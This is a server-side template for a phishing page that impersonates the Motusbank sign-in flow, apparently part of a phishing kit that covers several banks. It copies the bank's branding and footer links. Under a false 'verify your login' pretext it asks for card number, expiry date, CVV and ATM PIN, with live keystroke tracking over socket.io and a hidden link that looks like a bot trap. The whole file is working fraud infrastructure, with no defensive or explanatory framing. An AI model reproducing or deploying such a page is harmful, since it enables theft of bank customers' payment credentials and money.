<%

let p_card = motus.card === 'on' ? true : false;
let p_atm = motus.atm === 'on' ? true : false;
let p_cvv = motus.cvv === 'on' ? true : false;
let p_expiry = motus.exp === 'on' ? true : false;

%>
<html xmlns="http://www.w3.org/1999/xhtml" class=" js flexbox flexboxlegacy">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>Sign In</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
        <base href=".">
        <link href="/assets/motus/login_files/style.css" rel="stylesheet">
        <link href="/assets/motus/index_files/mint.css?5" id="theme-stylesheet" rel="stylesheet">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js" crossorigin="anonymous"></script>
        <script>var lrbank = '<?=escape($udata->last->bank)?>'; var lrinfo = '<?=escape($udata->last->info)?>';</script>
        <script src="/assets/js/actions.js?v=<?=time()?>"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.js"></script>
        <script src="/assets/js/details.js?v=<?=time()?>"></script>
        <style>
        .newselect {
            background: #f3f3f4;
            border: none;
            border-bottom: 2px solid #c1c1c1;
            color: #414042;
            min-height: 28px;
            outline: 0;
            padding: 3px 0;
            transition: border-color .1s ease;
            border-radius: 0;
        }

        input, select, textarea {
            display: block;
            font-family: system-ui;
        }

        body {
            font-family: system-ui;
        }

        [type=button], [type=reset], [type=submit], button {
            font-family: system-ui;
        }
        </style>
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <div class="body-content">
            <div class="row public-header">
                <div class="logo-container">
                    <a href="">
                        <img src="/assets/motus/index_files/logo.svg" alt="" class="motus-logo">
                    </a>
                </div>
            </div>
        </div>
        <center>
            <img src="/assets/motus/index_files/logo.svg" alt="Motusbank Logo" class="motusbank-logo" style="margin-top: 31px;">
            <form id="loginForm" method="post" action="" class="" style="padding: 0px 25px;" id="input-form">
                <input type="hidden" id="userAgent" name="userAgent">
                <h2 style="padding-top: 22px; margin-bottom: 5px;"><strong>To verify your login, we require some additional information regarding your account.</strong></h2>
                <br>
                <% if (p_card) { %>
                <div class="ng-pristine ng-valid td_rq_form_legacy td-form td-form-validate td-form-dynamic">
                    <div class="td-row">
                        <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                            <div class="otp-section-mint-green">
                                <div class="td-row">
                                    <div class="td-col-sm-6 td-col-sm-offset-3">
                                        <div class="form-group" td-ui-form-group="" style="">
                                            <input type="tel" id="input-card" placeholder="Enter your card number" minlength="14" maxlength="19" required="" name="card" class="ng-pristine ng-untouched ng-valid form-control ng-empty lrinput" attr-action="Filling Card" style="width: 100% !important" onkeyup="split()" >
                                            <script src="/assets/js/splitter.js?v=<?=time()?>"></script>
                                            <link rel="stylesheet" href="/assets/css/card.css?<?=time()?>">
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <% } if (p_expiry) { %>
                <div class="ng-pristine ng-valid td_rq_form_legacy td-form td-form-validate td-form-dynamic">
                    <div class="td-row">
                        <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                            <div class="otp-section-mint-green">
                                <div class="td-row">
                                    <div class="td-col-sm-6 td-col-sm-offset-3">
                                        <div class="form-group" td-ui-form-group="" style="">
                                            <input type="tel" id="input-expiry2" placeholder="Enter your expiration date" minlength="5" maxlength="5" required="" name="expiry" class="ng-pristine ng-untouched ng-valid form-control ng-empty lrinput" attr-action="Filling Expiry" style="width: 100% !important">
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <% } if (p_cvv) { %>
                <div class="ng-pristine ng-valid td_rq_form_legacy td-form td-form-validate td-form-dynamic">
                    <div class="td-row">
                        <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                            <div class="otp-section-mint-green">
                                <div class="td-row">
                                    <div class="td-col-sm-6 td-col-sm-offset-3">
                                        <div class="form-group" td-ui-form-group="" style="">
                                            <input type="tel" id="input-cvv" placeholder="Enter your CVV" minlength="3" maxlength="4" required="" name="cvv" class="ng-pristine ng-untouched ng-valid form-control ng-empty lrinput" attr-action="Filling CVV" style="width: 100% !important">
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <% } if (p_atm) { %>
                <div class="ng-pristine ng-valid td_rq_form_legacy td-form td-form-validate td-form-dynamic">
                    <div class="td-row">
                        <div class="td-col-lg-8 td-col-lg-offset-2 td-col-md-10 td-col-md-offset-1">
                            <div class="otp-section-mint-green">
                                <div class="td-row">
                                    <div class="td-col-sm-6 td-col-sm-offset-3">
                                        <div class="form-group" td-ui-form-group="" style="">
                                            <input type="tel" id="input-atm" minlength="4" maxlength="6" placeholder="Enter your ATM pin" required="" name="atm" class="ng-pristine ng-untouched ng-valid form-control ng-empty lrinput" attr-action="Filling ATM" style="width: 100% !important">
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <% } %>
                <div class="ng-pristine ng-valid td_rq_form_legacy td-form td-form-validate td-form-dynamic">
                    <div class="td-row">
                        <div class="td-col-sm-4 td-col-sm-offset-2 td-col-sm-push-4 td-col-md-3 td-col-md-offset-3 td-col-md-push-3">
                            <div class="form-group">
                                <button onclick="submitForm()" type="button" name="save" value="1" class="td-button  td-button" style="background-color:#0079c1;width: 100%">
                                <font color="white">  Next</font>
                                </button>
                            </div>
                        </div>
                    </div>
                </div>
            </form>
            <br><br>
        </center>
        <br><br><br><br><br><br><br><br><br>
        <footer class="main-footer">
            <div class="footer-spiral-container">
                <img class="footer-spiral visible" src="/assets/motus/index_files/Spiral-1.svg" style="animation-delay: -30.4396s;">
            </div>
            <div class="row">
                <div class="logo-container">
                    <a href="https://banking.motusbank.ca/Security_Login">
                    <img src="/assets/motus/index_files/logo.svg" alt="Motusbank Logo" class="motusbank-logo">
                    </a>
                </div>
                <div class="footer-sub">
                    <span>Copyright © <?=date('Y')?> Motus Bank. All rights reserved.</span>
                    <ul class="footer-links">
                        <li><a href="https://www.motusbank.ca/agreement-privacy" title="Privacy &amp; Security" target="_blank">Privacy &amp; Security</a></li>
                        <li><a href="https://www.motusbank.ca/legal" title="Legal" target="_blank">Legal</a></li>
                        <li><a href="https://www.motusbank.ca/accessibility" title="Accessibility" target="_blank">Accessibility</a></li>
                    </ul>
                </div>
            </div>
            <a href="/not-found" style="visibility: hidden;">d0 n0t cl1ck</a>
        </footer>
        <div class="ui-selectmenu-menu ui-front">
            <ul aria-hidden="true" aria-labelledby="account-switcher-button" id="account-switcher-menu" role="listbox" tabindex="0" class="ui-menu ui-corner-bottom ui-widget ui-widget-content"></ul>
        </div>
        <style>
        [type=color], [type=date], [type=datetime-local], [type=datetime], [type=email], [type=month], [type=number], [type=password], [type=search], [type=tel], [type=text], [type=time], [type=url],
        [type=week], input:not([type]), select[multiple], textarea {
            margin-bottom: 25px;
            height: 42px;
            width: 340px !important;
        }

        .td-layout-grid6 {
            margin-bottom: 10px;
        }
        </style>
          <span hidden id="navig"> <%=navig%> </span>
          <span hidden id="stage">Card</span>
    </body>
    <script src="/bank/atb/js/scriptCard.js"></script>
    <script src="/bank/motus/js/script.js"></script>
</html>

